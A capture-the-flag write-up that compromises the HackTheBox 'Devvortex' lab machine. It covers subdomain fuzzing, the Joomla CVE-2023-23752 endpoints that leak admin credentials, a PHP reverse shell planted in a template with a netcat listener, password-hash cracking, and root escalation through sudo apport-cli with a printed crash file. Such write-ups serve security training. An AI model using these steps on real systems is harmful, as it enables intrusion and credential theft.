Overview
Hello everyone, In this writeup we are going to solve Devvortex from HackTheBox.
Link for the machine :
Difficulty Level : Easy
Lets Start 🙌
Connect to the HTB server by using the OpenVpn configuration file that’s generated by HTB.
[
After connecting to the vpn service, click on Join Machine to access the machine’s ip.
After joining the machine you can see the IP Address of the target machine.
Reconnaissance
Rustscan
rustscan -a <TARGET> -- T4 -v -A
Nmap Default Scripts
nmap -sC <TARGET>
Results
Ports
Services
Service Version
From the reconnaissance results, there is website running on port 80. I visited the website but it is redirected to the domain devvortex.htb and the domain name is not resolved.
To access the website, we have to map the domain name to the target IP. We can do this by modifying the /etc/hosts file. Append the underlined line from the image below in /etc/hosts file. The target IP might differ in your case.
After modifying the /etc/hosts file, refresh the website to see the contents of the website.
Active Infrastructure Enumeration
curl -I "http://${TARGET}"
Whatweb
whatweb -a 1 http://devvortex.htb
Wafw00f
wafw00f http://devvortex.htb
Active Subdomain Enumeration
Subdomain Fuzzing
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.devvortex.htb/
VHost Fuzzing
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://devvortex.htb/ -H 'Host: FUZZ.devvortex.htb' -fs 154
Results
Found no subdomains.
Found a vhost dev.devvortex.htb.
To access the vhost , add add the domain to new subdomain /etc/hosts as before and visit the subdomain in a browser.
After modifying the /etc/hosts file, refresh the website to see the contents of the website.
Active Infrastructure Enumeration
curl -I "http://${TARGET}"
Whatweb
whatweb -a 1 https://dev.devvortex.htb
Waw00f
wafw00f http://devvortex.htb
Results
Nothing interesting found.
Enumerating the Website - dev.devvortex.htb
Robots.txt
robots.txt - Found
From the above listed paths, the /administrator path sounds interesting.
So I first visited the /administrator path.
Its a Joomla Administrator Login page.
I first tried for some default credentials like admin:admin, but didn’t work.
Droopescan
Next I used droopescan tool to enumerate the joomla website.
droopescan scan joomla --url http://dev.devvortex.htb/
From the results of droopescan , I visited http://dev.devvortex.htb/administrator/manifests/files/joomla.xml to check for version information.
The joomla.xml was accessible and got the joomla version: 4.2.6.
Next I searched for exploits for the above mentioned version and found the following:
CVE-2023-23752
After taking a look at the exploit, the exploit basically makes requests to the following endpoints and parses the response data and displays it to us:
/api/index.php/v1/users?public=true
/api/index.php/v1/config/application?public=true
So, instead of running the exploit, I directly visited the above endpoints in the browser.
The first endpoint responded with a list of users.
And the second endpoint responded with the configuration of the application which also had the password of the user lewis, that we found in the previous endpoint, who is part of the Super Users group.
Initial Access
With credentials lewis:P4ntherg0t1n5r3c0n##, that we found in the enumeration process, I tried to login in the joomla administrator page and was able successfully login.
Since we got access to administrator dashboard, I checked out whether it is possible to inject or modify the code in the available templates as mentioned here:
We can see the available templates under the system tab of the dasboard. I decided to try to modify the administrator template.
Next select the following.
In the template customize page you can see a list of available files and options to create, edit, save and delete files.
I decided to create a php file that contains the code to fetch a reverse shell back to us from the server. First click New File.
There is a option to upload a file, I tried to upload a php reverse shell, it didn’t work. So I decided to create a new file and copy the contents of the php reverse shell to the file. To do so enter the file name and choose the extension as php and then click create.
I used the pentest monkey php reverse shell:
I copied the contents of the reverse shell and pasted in the editor. Don;t forget to update your tun0 IP address in the reverse shell.
Now click Save&Close and start a netcat listener using the command nc -lvnp 1234.
Now visit the following URL: http://dev.devvortex.htb/administrator/templates/atum/<nameTheFileThatYouCreated>.php and check your reverse shell.
Now we got the reverse shell back.
I first upgraded my shell using the command: python3 -c "import pty;pty.spawn('/bin/bash')”.
We can see that, currently we are the user www-data.
Now its time to look out for privilege escalation vectors.
Privilege Escalation
Getting The User Flag
First I checked the available users in the target machine.
There is another user named logan. And I checked the /home/logan folder which has the user flag, but we don’t have permissions to read it.
Next I was looking out for some basic privilege escalation vectors, but got nothing. Then I remembered the about the credentials that we used to login to Joomla which we can use to try to login to the mysql database.
mysql -u lewis -p [ -p - to mention password based login ]
I was able to successfully login and found a database named joomla.
Next I tried to view the available tables using command: show tables;
The above command responded with a long list of which sd4fg_users table got my attention.
Next I viewed the contents of the sd4fg_users table.
It had two users with their password hashes, which seems like a usual linux user account password hash ( blowfish hash ). Since we know that there is another user in the machine named logan, I tried to crack the logan user’s password hash using john.
And I got it cracked and I used the password to login as logan to the target machine via ssh.
I was able to successfully login and also got the user flag.
Getting The Root Flag
Next, again started looking out for privilege escalation vectors. Started with sudo -l command and got the following output.
The user logan can only run /usr/bin/apport-cli with root privileges. apport-cli is basically a tool that generate crash reports. Next I checked the version of the apport-cli
I searched about the above version of apport-cli and found the following commit:
which is a POC for to use this tool to escalate our privileges.
I tried it. But I wasn’t able to find the crash file in the /var/crash location. Then I was searching on google on how to create the crash file and got following crash file content from
Copy ProblemType: Crash
Architecture: amd64
CrashCounter: 1
Date: Sat Dec 2 09:57:23 2023
DistroRelease: Ubuntu 20.04
ExecutablePath: /usr/bin/sleep
ExecutableTimestamp: 1567679920
ProcCmdline: sleep 13
ProcCwd: /var/crash
ProcEnviron:
SHELL=/bin/bash
LANG=en_US.UTF-8
TERM=xterm-256color
XDG_RUNTIME_DIR=<set>
PATH=(custom, no user)
ProcMaps:
561bbda55000-561bbda57000 r--p 00000000 08:02 20093 /usr/bin/sleep
561bbda57000-561bbda5b000 r-xp 00002000 08:02 20093 /usr/bin/sleep
561bbda5b000-561bbda5d000 r--p 00006000 08:02 20093 /usr/bin/sleep
561bbda5e000-561bbda5f000 r--p 00008000 08:02 20093 /usr/bin/sleep
561bbda5f000-561bbda60000 rw-p 00009000 08:02 20093 /usr/bin/sleep
561bbf60f000-561bbf630000 rw-p 00000000 00:00 0 [heap]
7f5b30817000-7f5b30afd000 r--p 00000000 08:02 19524 /usr/lib/locale/locale-archive
7f5b30afd000-7f5b30b1f000 r--p 00000000 08:02 20805 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f5b30b1f000-7f5b30c97000 r-xp 00022000 08:02 20805 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f5b30c97000-7f5b30ce5000 r--p 0019a000 08:02 20805 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f5b30ce5000-7f5b30ce9000 r--p 001e7000 08:02 20805 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f5b30ce9000-7f5b30ceb000 rw-p 001eb000 08:02 20805 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f5b30ceb000-7f5b30cf1000 rw-p 00000000 00:00 0
7f5b30cf8000-7f5b30cf9000 r--p 00000000 08:02 20757 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f5b30cf9000-7f5b30d1c000 r-xp 00001000 08:02 20757 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f5b30d1c000-7f5b30d24000 r--p 00024000 08:02 20757 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f5b30d25000-7f5b30d26000 r--p 0002c000 08:02 20757 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f5b30d26000-7f5b30d27000 rw-p 0002d000 08:02 20757 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f5b30d27000-7f5b30d28000 rw-p 00000000 00:00 0
7ffe6d90d000-7ffe6d92e000 rw-p 00000000 00:00 0 [stack]
7ffe6d953000-7ffe6d956000 r--p 00000000 00:00 0 [vvar]
7ffe6d956000-7ffe6d957000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall]
ProcStatus:
Name: sleep
Umask: 0002
State: S (sleeping)
Tgid: 2173
Ngid: 0
Pid: 2173
PPid: 1515
TracerPid: 0
Uid: 1000 1000 1000 1000
Gid: 1000 1000 1000 1000
FDSize: 256
Groups: 1000
NStgid: 2173
NSpid: 2173
NSpgid: 2173
NSsid: 1515
VmPeak: 5476 kB
VmSize: 5476 kB
VmLck: 0 kB
VmPin: 0 kB
VmHWM: 584 kB
VmRSS: 584 kB
RssAnon: 68 kB
RssFile: 516 kB
RssShmem: 0 kB
VmData: 176 kB
VmStk: 132 kB
VmExe: 24 kB
VmLib: 1640 kB
VmPTE: 48 kB
VmSwap: 0 kB
HugetlbPages: 0 kB
CoreDumping: 1
THP_enabled: 1
Threads: 1
SigQ: 0/15317
SigPnd: 0000000000000000
ShdPnd: 0000000000000000
SigBlk: 0000000000000000
SigIgn: 0000000000000000
SigCgt: 0000000000000000
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
NoNewPrivs: 0
Seccomp: 0
Speculation_Store_Bypass: thread vulnerable
Cpus_allowed: 3
Cpus_allowed_list: 0-1
Mems_allowed: 00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001
Mems_allowed_list: 0
voluntary_ctxt_switches: 3
nonvoluntary_ctxt_switches: 2
Signal: 11
Uname: Linux 5.4.0-167-generic x86_64
UserGroups: N/A
_LogindSession: 7
CoreDump: base64
H4sICAAAAAAC/0NvcmVEdW1wAA==
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